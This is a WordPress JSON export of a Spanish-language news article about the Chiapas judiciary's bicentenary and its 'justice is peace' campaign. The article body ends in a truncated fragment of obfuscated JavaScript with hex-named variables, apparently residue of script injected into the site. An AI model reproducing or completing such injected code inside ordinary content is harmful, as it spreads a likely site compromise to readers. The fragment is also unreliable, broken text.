{"id":21851,"date":"2025-05-13T00:42:58","date_gmt":"2025-05-13T00:42:58","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21851"},"modified":"2025-05-13T00:42:59","modified_gmt":"2025-05-13T00:42:59","slug":"en-chiapas-la-consolidacion-de-una-cultura-de-paz-y-de-legalidad-es-uno-de-los-mayores-avances-en-estos-200-anos-de-justicia-juan-carlos-moreno-guillen","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21851","title":{"rendered":"En Chiapas, la consolidaci\u00f3n de una cultura de paz y de legalidad es uno de los mayores avances en estos 200 a\u00f1os de justicia: Juan Carlos Moreno Guill\u00e9n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250512-WA0045-1024x681.jpg\" alt=\"\" class=\"wp-image-21852\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250512-WA0045-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250512-WA0045-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250512-WA0045-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250512-WA0045-1536x1021.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250512-WA0045-2048x1362.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250512-WA0045-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>12 de mayo del 2025. Tuxtla Guti\u00e9rrez.- El magistrado presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, en una reciente entrevista con medios de comunicaci\u00f3n, relat\u00f3 los cambios internos y externos que se han implementado para fortalecer la justicia con humanismo, con la cual se beneficia a las y los chiapanecos.<\/p>\n\n\n\n<p>Al respecto, Moreno Guill\u00e9n explic\u00f3 que el humanismo es la idea central con la que se han realizado campa\u00f1as, pol\u00edticas y acciones que permean y fortalecen la cultura de paz en Chiapas, y en la casa de la justicia, la gran familia judicial ha tomado el compromiso de continuar con la noble tarea de impartir justicia con humanismo.<\/p>\n\n\n\n<p>Desde que asumi\u00f3 la encomienda al frente del Poder Judicial, Juan Carlos Moreno afirm\u00f3 que una de las t\u00e9cnicas que ha permitido ampliarle el panorama real de la instituci\u00f3n y conocer las deficiencias y las oportunidades que exist\u00edan fue escuchar a las y los trabajadores para resolver las grandes carencias que la instituci\u00f3n presentaba, tanto en los inmuebles como en la atenci\u00f3n a las personas usuarias.<\/p>\n\n\n\n<p>\u201cAcabamos de realizar eventos significativos y conmemorativos a los 200 a\u00f1os de justicia en Chiapas, en los que se busc\u00f3 combinar cultura, tradici\u00f3n e historia, de manera trascendental para las y los trabajadores, pero nuestra mayor celebraci\u00f3n fue que cada d\u00eda contamos con m\u00e1s espacios dignos, con m\u00e1s inclusi\u00f3n y con m\u00e1s compromiso con las y los justiciables\u201d, exclam\u00f3 Moreno Guill\u00e9n.<\/p>\n\n\n\n<p>Con respecto al bicentenario del Poder Judicial, el presidente del Tribunal Superior de Justicia asever\u00f3 que la consolidaci\u00f3n de una cultura de paz y de legalidad es uno de los mayores avances en estos 200 a\u00f1os. Ahora, con el mejoramiento, con capacitaci\u00f3n y sensibilizaci\u00f3n de las y los servidores judiciales, las y los ciudadanos tienen una mayor certeza, percepci\u00f3n y confianza en esta instituci\u00f3n.<\/p>\n\n\n\n<p>Adem\u00e1s, para seguir impulsando la campa\u00f1a de \u201cLa justicia es la paz\u201d, el magistrado presidente Moreno Guill\u00e9n dijo que se ha fortalecido la comunicaci\u00f3n entre el Poder Judicial y el pueblo de Chiapas, con el fin de que las y los chiapanecos sepan que las personas que cometan delitos que laceren el tejido social no quedar\u00e1n impunes; asimismo, que permitan identificar y reconozcan cu\u00e1les son las facultades y el quehacer judicial.<\/p>\n\n\n\n<p>Por \u00faltimo, refrend\u00f3 el compromiso que tiene con el pueblo chiapaneco con la impartici\u00f3n de una justicia humanista, incluyente y accesible, impulsando acciones que demuestren que la justicia es la paz.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 12 de mayo del 2025. Tuxtla Guti\u00e9rrez.- El magistrado presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, en una reciente entrevista con medios de comunicaci\u00f3n, relat\u00f3 los cambios internos y externos que se han implementado para fortalecer la justicia con humanismo, con la cual se beneficia a las y los chiapanecos. Al &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21852,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-21851","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21851","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21851"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21851\/revisions"}],"predecessor-version":[{"id":21853,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21851\/revisions\/21853"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21852"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21851"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21851"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21851"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}